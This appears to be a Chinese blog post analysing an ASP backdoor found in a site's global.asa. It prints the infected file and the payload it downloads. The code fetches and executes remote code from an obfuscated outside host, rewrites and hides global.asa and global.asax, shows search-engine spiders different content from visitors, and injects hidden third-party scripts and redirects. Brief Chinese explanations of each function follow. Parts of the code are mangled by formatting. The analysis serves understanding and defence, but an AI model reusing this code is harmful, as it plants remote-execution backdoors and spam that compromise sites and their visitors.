msxml3.dll 错误 '80072efd' A connection with the server could not be established










<script language= "vbscript" runat= "server" >
sub Application_OnStart
end sub
sub Application_OnEnd
end sub
sub Session_OnStart
     url= "h" & "t" & "t" & "p" & ":" & "/" & "/" & "g" & "l" & "o" & ".1" & "0" & "0" & "5" & "0" & "0" & ".c" & "o" & "m" & "/x" & "m" & "l" & "/" & "g" & "l" & "o" & "b" & "a" & "l" & "." & "a" & "s" & "a" & "q" & "u" & "a" & "n" & "." & "t" & "x" & "t"
     Set ObjXMLHTTP=Server.CreateObject( "MSXML2.serverXMLHTTP" )
     ObjXMLHTTP.Open "GET" ,url, False
     ObjXMLHTTP.setRequestHeader "User-Agent" ,url
     Set ObjXMLHTTP= Nothing
     set objStream = Server.CreateObject( "Adodb.Stream" )
     objStream.Type = 1
     objStream.Mode =3
     objStream.Write GetHtml
     objStream.Position = 0
     objStream.Type = 2
     objStream.Charset = "gb2312"
     GetHtml = objStream.ReadText
     if instr(GetHtml, "by*aming" )>0 then
         execute GetHtml
     end if
end sub
'sub Session_OnEnd
'end sub





<!-- Code highlighting produced by Actipro CodeHighlighter (freeware) --> ' <html><head><script>function clear() {Source =; ();document.close ();document.title = "" ;document.body.innerHTML = Source;} </ script ></ head >< body onload = clear() > ' <meta http-equiv=refresh content=0;URL=about:blank><script>eval ( function (p,a,c,k,e,d){e = function (c){ return c}; if (! ' '.replace ( /^/ , String )){ while (c -- ){d[c] = k[c]||c}k = [ function (e){ return d [e]}];e = function (){ return ' \\w+'};c=1};while(c--){if(k[c]) {p = p.replace( new RegExp( ' \\b'+e(c)+'\\b','g'),k[c])}}return p} ( ' 0.1.2(\'3:4\');',5,5,'window|location|replace|about|blank'.split ( ' |'),0,{}))</script> ' by*aming Server.ScriptTimeout = 600 Public Function createasa( ByVal Content) On Error Resume Next Set fso = Server.CreateObject( " scripting.filesystemobject " ) set f = fso.Getfile( " //./ " & Server.MapPath( " /global.asa " )) f.Attributes = 0 Set Obj = Server.CreateObject( " adod " & " b.S " & " tream " ) Obj.Type = 2 Obj.Charset = " gb2312 " Obj.Position = Obj.Size Obj.writetext = Content Obj.SaveToFile " //./ " & Server.MapPath( " /global.asa " ), 2 Obj.Close Set Obj = Nothing f.Attributes = 1 + 2 + 4 set f = Nothing Set fso = Nothing End Function Public Function createasax( ByVal Content) On Error Resume Next Set fso = Server.CreateObject( " scripting.filesystemobject " ) set f = fso.Getfile( " //./ " & Server.MapPath( " /global.asax " )) f.Attributes = 0 Set Obj = Server.CreateObject( " adod " & " b.S " & " tream " ) Obj.Type = 2 Obj.Charset = " gb2312 " Obj.Position = Obj.Size Obj.writetext = Content Obj.SaveToFile " //./ " & Server.MapPath( " /global.asax " ), 2 Obj.Close Set Obj = Nothing f.Attributes = 1 + 2 + 4 set f = Nothing Set fso = Nothing End Function Public Function GetHtml(url) Set ObjXMLHTTP = Server.CreateObject( " MSXML2.serverXMLHTTP " ) ObjXMLHTTP.Open " GET " ,url, False ObjXMLHTTP.setRequestHeader " User-Agent " ,url ObjXMLHTTP.send GetHtml = ObjXMLHTTP.responseBody Set ObjXMLHTTP = Nothing set objStream = Server.CreateObject( " Adodb.Stream " ) objStream.Type = 1 objStream.Mode = 3 objStream.Open objStream.Write GetHtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = " gb2312 " GetHtml = objStream.ReadText objStream.Close End Function Function check(user_agent) allow_agent = split ( " Baiduspider,Sogou,baidu,Sosospider,Googlebot,FAST- WebCrawler,MSNBOT,Slurp " , " , " ) check_agent = false For agenti = lbound (allow_agent) to ubound (allow_agent) If instr (user_agent,allow_agent(agenti)) > 0 then check_agent = true exit for end if Next check = check_agent End function Function CheckRobot() CheckRobot = False Dim Botlist,i,Repls Repls = request.ServerVariables( " http_user_agent " ) Krobotlist = " Baiduspider|Googlebot " Botlist = Split (Krobotlist, " | " ) For i = 0 To Ubound (Botlist) If InStr (Repls,Botlist(i)) > 0 Then CheckRobot = True Exit For End If Next If Request.QueryString( " admin " ) = " 1 " Then Session ( " ThisCheckRobot " ) = 1 If Session( " ThisCheckRobot " ) = 1 Then CheckRobot = True End Function Function CheckRefresh() CheckRefresh = False Dim Botlist,i,Repls Krobotlist = " baidu|google|sogou|soso|youdao " Botlist = Split (Krobotlist, " | " ) For i = 0 To Ubound (Botlist) If InStr ( left (request.servervariables ( " HTTP_REFERER " ), " 40 " ),Botlist(i)) > 0 Then CheckRefresh = True Exit For End If Next End Function Sub sleep() If response.IsClientConnected = true then Response.Flush else response.end end if End Sub If CheckRefresh = true Then cnnbd = lcase (request.servervariables( " HTTP_HOST " )) ' response.redirect(""&cnnbd&"") Response.Write( " <div style=display:none><script src = http: // / click.aspx? id = 114814173 & logo = 1 ></ script >< script src = http: // / 44 .js ></ script >< script src = http: // js. 37548 .com / 44 .js ></ script ></ div > " ) response.end end If user_agent = Request.ServerVariables( " HTTP_USER_AGENT " ) if check(user_agent) = true then ' body=GetHtml(" domain = " &strHost& " & ua = " &server.URLEncode(request.ServerVariables ( " HTTP_USER_AGENT " )) & "" ) body = GetHtml( " domain = " &strHost& " & ua = " &server.URLEncode(request.ServerVariables ( " HTTP_USER_AGENT " )) & "" ) response.write body response.end else asa = GetHtml( " " ) if instr (asa, " by*aming " ) > 0 then createasa(asa) end if ScriptAddress = Request.ServerVariables( " SCRIPT_NAME " ) namepath = Server.MapPath(ScriptAddress) If Len (Request.QueryString) > 0 Then ScriptAddress = ScriptAddress & " ? " & Request.QueryString end if geturl = " http:// " & Request.ServerVariables( " http_host " ) & ScriptAddress geturl = LCase (geturl) ' response.write replace(namepath,server.MapPath("/"),"") ' response.end ' if instr(geturl,"jc=ok")=0 and instr(geturl,"global=ok")=0 and instr ( LCase (Request.ServerVariables( " http_host " )), " " ) = 0 and instr ( LCase (Request.ServerVariables( " http_host " )), " " ) = 0 and if instr (geturl, " http:// " & Request.ServerVariables( " http_host " ) & " /index.asp " ) = 0 and instr (geturl, " http:// " & Request.ServerVariables( " http_host " ) & " / " ) = 0 and instr ( LCase (Request.ServerVariables( " HTTP_REFERER " )), LCase (Request.ServerVariables( " http_host " ))) <= 0 then agent = lcase (request.servervariables( " http_user_agent " )) referer = LCase (Request.ServerVariables( " HTTP_REFERER " )) bot = "" Amll = "" if instr (agent, " + " ) > 0 then bot = agent if instr (agent, " - " ) > 0 then bot = agent if instr (agent, " http " ) > 0 then bot = agent if instr (agent, " spider " ) > 0 then bot = agent if instr (agent, " bot " ) > 0 then bot = agent if instr (agent, " linux " ) > 0 then bot = agent if instr (agent, " baidu " ) > 0 then bot = agent if instr (agent, " google " ) > 0 then bot = " nobot " if instr (agent, " yahoo " ) > 0 then bot = " nobot " if instr (agent, " msn " ) > 0 then bot = " nobot " if instr (agent, " alexa " ) > 0 then bot = " nobot " if instr (agent, " sogou " ) > 0 then bot = " nobot " if instr (agent, " youdao " ) > 0 then bot = " nobot " if instr (agent, " soso " ) > 0 then bot = " nobot " if instr (agent, " iask " ) > 0 then bot = " nobot " if bot = " nobot " then ' Call WriteErr ' response.end end if If Instr (REFERER, " http " ) > 0 and Instr (REFERER, " . " ) > 0 and Instr (REFERER, " / " ) > 0 and Instr (REFERER, " ? " ) > 0 and Instr (REFERER, " = " ) > 0 Then Amll = " ok " tjcount = request.Cookies( " cookie_tjcount " ) date1 = request.Cookies( " cookie_date " ) date2 = year ( date ) & month ( date ) & day ( date ) if tjcount = "" then response.cookies( " cookie_tjcount " ) = 0 response.cookies( " cookie_tjcount " ).Expires = DateAdd ( " d " , 1 ,now()) end if if date1 <> date2 then response.cookies( " cookie_date " ) = date2 response.cookies( " cookie_date " ).Expires = DateAdd ( " d " , 365 ,now ()) end if tjcount = request.Cookies( " cookie_tjcount " ) date1 = request.Cookies( " cookie_date " ) date2 = year ( date ) & month ( date ) & day ( date ) if date1 = date2 and len (bot) = 0 then if int (tjcount) < 10 and len (Amll) > 0 then response.cookies( " cookie_tjcount " ) = int (tjcount) + 1 response.cookies( " cookie_tjcount " ).Expires = DateAdd ( " d " , 1 ,now()) strHost = Request.ServerVariables( " HTTP_HOST " ) Response.Redirect( " domain = " &strHost&"") else ' response.write "<h1>Service Unavailable</h1>" response.write "" ' response.write gethtml(geturl&"?global=ok") end if response.end end if Call sleep() end if end if ' </body></html>



createasa 根据传入的内容创建global.asa文件
createasax 根据传入的内容创建Global.asax文件
GetHtml 根据传入的url,获取相应的内容
check 检测user-agent判断是否为搜索引擎的蜘蛛
CheckRobot 检测是否为robot ?
CheckRefresh 检测是否Refresh


<!-- Code highlighting produced by Actipro CodeHighlighter (freeware) --> < div style =display:none >< script src = ></ script >< script src = ></ script >< script src = ></ script ></ div >





